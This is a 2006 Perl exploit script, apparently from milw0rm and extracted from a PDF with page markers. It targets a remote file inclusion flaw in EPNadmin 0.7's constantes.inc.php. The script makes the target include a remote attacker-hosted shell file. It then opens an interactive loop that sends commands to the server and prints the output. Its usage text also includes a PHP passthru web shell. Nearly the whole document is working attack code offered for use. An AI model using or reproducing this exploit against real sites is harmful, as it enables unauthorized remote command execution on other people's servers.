1 #!/usr/bin/perl
2 #
3 # EPNadmin remote Command Execution Vulnerabilities
4 #
5 # Risk : High (Remote Code Execution)
6 #
7 # Url: http://epnadmin.pierrefitte93.fr
8 #
9 # Version : 0.7
10 #
11 # (c)oded and f0und3d by Kw3[R]Ln <ciriboflacs[AT]YaHOo.com>
12 #
13 # Romanian Security Team .: hTTp://RST−CREW.NET :.
14 #
15 # Shoutz to [Oo], str0ke, th0r and all members of RST !
16
17 use LWP::Simple;
18
19 print "...........................[RST]...............................\n";
20 print ". .\n";
21 print ". EPNadmin 0.7 remote Command Execution Vulnerabilities .\n";
22 print ". .\n";
23 print "...............................................................\n";
24 print ". Romanian Security Team −> hTTp://RST−CREW.NET .\n";
25 print ". [c]oded by Kw3rLN − kw3rln[AT]rst−crew.net .\n";
26 print "...............................................................\n\n";
27
28 my $kw3,$path,$shell,$conexiune,$cmd,$data ;
29
30
31 if ((!$ARGV[0]) || (!$ARGV[1])) { &usage;exit(0);}
32
33 $path = $ARGV[0];
34 chomp($path);
35 $shell = $ARGV[1];
36 chomp($shell);
37
38 $path = $path."/constantes.inc.php";
39
40
41 sub usage(){
42
print "Usage : perl $0 host/path http://site.com/cmd.txt\n\n";
43
print "Example : perl $0 http://127.0.0.1 http://site.com/cmd.txt\n\n";
44 print ’Shell : <?php ob_clean();ini_set("max_execution_time",0);passthru($_GET["cmd"]);die;?>’;
45 }
46
47 while ()
48 {
49 print "[kw3rln].[rst] :~\$ ";
50 chomp($cmd=<STDIN>);
51 if ($cmd eq "exit") { exit(0);}
52
Page 1/2
EPNadmin 0.7 constantes.inc.php Remote File Include Exploit
Kw3[R]Ln
10/19/2006
53 $kw3 = $path."?langage=".$shell."?&cmd=".$cmd;
54 if ($cmd eq "")
55 { print "Enter your command !\n"; }
56 else
57 { $data=get($kw3); print $data ; }
58
59 }
60
61 # milw0rm.com [2006−10−19]
Page 2/2
EPNadmin 0.7 constantes.inc.php Remote File Include Exp